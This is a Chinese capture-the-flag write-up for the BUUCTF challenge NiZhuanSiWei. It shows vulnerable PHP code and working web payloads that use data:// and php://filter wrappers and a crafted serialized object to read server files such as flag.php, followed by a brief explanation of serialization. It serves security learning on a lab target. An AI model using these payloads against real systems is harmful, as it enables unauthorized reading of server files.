BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解（php伪协议+序列化与反序列化）

港控/mmm° 2022-09-05 14:58 96阅读 0赞

### 文章目录 ###

*  \[ZJCTF 2019\]NiZhuanSiWei
 *   *  解题过程
     *  序列化与反序列化
     *   *  练习
     *  POC、EXP、Payload与Shellcode

# \[ZJCTF 2019\]NiZhuanSiWei #

## 解题过程 ##

<?php  
    $text = $_GET["text"];
    $file = $_GET["file"];
    $password = $_GET["password"];
    if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
              
        echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
        if(preg_match("/flag/",$file)){
        
            echo "Not now!";
            exit(); 
        }else{
        
            include($file);  //useless.php
            $password = unserialize($password);
            echo $password;
        }
    }
    else{
        
        highlight_file(__FILE__);
    }
    ?>

**一、** [PHP file\_get\_contents() 函数详解][PHP file_get_contents_]

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

要求我们传入一个`text`文件，内容为`welcome to the zjctf`，我们可以使用[PHP伪协议][PHP]中的`php://input`【将`post`请求中的数据作为`PHP`代码执行】或者`data://`【写入协议】。

?text=data://text/plain,welcome to the zjctf
    
    ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=  //使用base64编码

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center]  
**二、**

if(preg_match("/flag/",$file)){
        
            echo "Not now!";
            exit(); 
        }else{
        
            include($file);  //useless.php
            $password = unserialize($password);
            echo $password;
        }

[PHP preg\_match()函数详解][PHP preg_match]

执行正则表达式匹配，文件中不能出现`flag`。我们先尝试直接访问`useless.php`,依然为题目一开始点开的源码。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 1]  
我们有看到`useless.php`文件包含，在这之前我们需要先使用`filter`协议读取里面的源码，然后将`password`反序列化出来，这需要我们使用序列化来还原`password`。

/?file=php://filter/read=convert.base64-encode/resource=useless.php
    
    /?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 2]  
**三**、得到一段`base64`编码后，解密得

<?php  
    class Flag{
          //flag.php  
        public $file;  
        public function __tostring(){
          
            if(isset($this->file)){
          
                echo file_get_contents($this->file); 
                echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
            }  
        }  
    }  
    ?>

在[PHP在线工具][PHP 1]中进行序列化操作

<?php
     
    class Flag{
          //flag.php  
        public $file="flag.php";  
        public function __tostring(){
          
            if(isset($this->file)){
          
                echo file_get_contents($this->file); 
                echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
            }  
        }  
    }  
    $a=new Flag();
    echo serialize($a);
    ?>

或者

<?php
     
    class Flag{
          //flag.php  
        public $file="flag.php";    
     }  
    echo serialize(new Flag);
    ?>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 3]

得到

O:4:"Flag":1:{
        s:4:"file";s:8:"flag.php";}

> 这里的`O`是对象的意思，表示变量类型；  
> `4`为类名长度；  
> 调用了名为`flag`的类；  
> `1`为属性数量（类的变量个数）；  
> \{属性类型，属性名长度，属性名；属性类型，属性名长度，属性名\}

最终的`payload`为

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{
        s:4:"file";s:8:"flag.php";}

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 4]  
查看网页源码后得到`flag`。![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 5]

## 序列化与反序列化 ##

序列化和反序列化的定义：

> Java序列化就是指把Java对象转换为字节序列的过程  
> Java反序列化就是指把字节序列恢复为Java对象的过程。

> 序列化最重要的作用：在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。

> 反序列化的最重要的作用：根据字节流中保存的对象状态及描述信息，通过反序列化重建对象。

**总结**：核心作用就是对象状态的保存和重建。（整个过程核心点就是字节流中所保存的对象状态及描述信息）

### 练习 ###

[pikachu漏洞练习平台（PHP序列化反序列化）][pikachu_PHP]

## POC、EXP、Payload与Shellcode ##

[渗透中POC、EXP、Payload与Shellcode的区别][POC_EXP_Payload_Shellcode]

[PHP file_get_contents_]: https://www.runoob.com/php/func-filesystem-file-get-contents.html
[PHP]: https://blog.csdn.net/m0_55854679/article/details/118114696
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center]: /images/20220829/d053e2ba43164a2ea83010826709e965.png
[PHP preg_match]: https://blog.csdn.net/qq_43802454/article/details/100530017?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162928214316780274112493%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162928214316780274112493&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_click~default-1-100530017.first_rank_v2_pc_rank_v29&utm_term=preg_match&spm=1018.2226.3001.4187
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20220829/1595bd5c4fd2480a8bcf69c89ffc8e56.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20220829/9cc0e9eea93245efaee17834e6f6575c.png
[PHP 1]: https://c.runoob.com/compile/1
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20220829/59d203d8ab2d408482bfa54961a2abec.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20220829/87f711eb69bf48ffbb8071ef7a22bff8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzU1ODU0Njc5_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20220829/f8ce82d200ec43fea72a72d06ca90af5.png
[pikachu_PHP]: https://blog.csdn.net/m0_55854679/article/details/116029046
[POC_EXP_Payload_Shellcode]: https://blog.csdn.net/weixin_43625577/article/details/92643949?ops_request_misc=&request_id=&biz_id=102&utm_term=poc%20exp&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-.nonecase&spm=1018.2226.3001.4187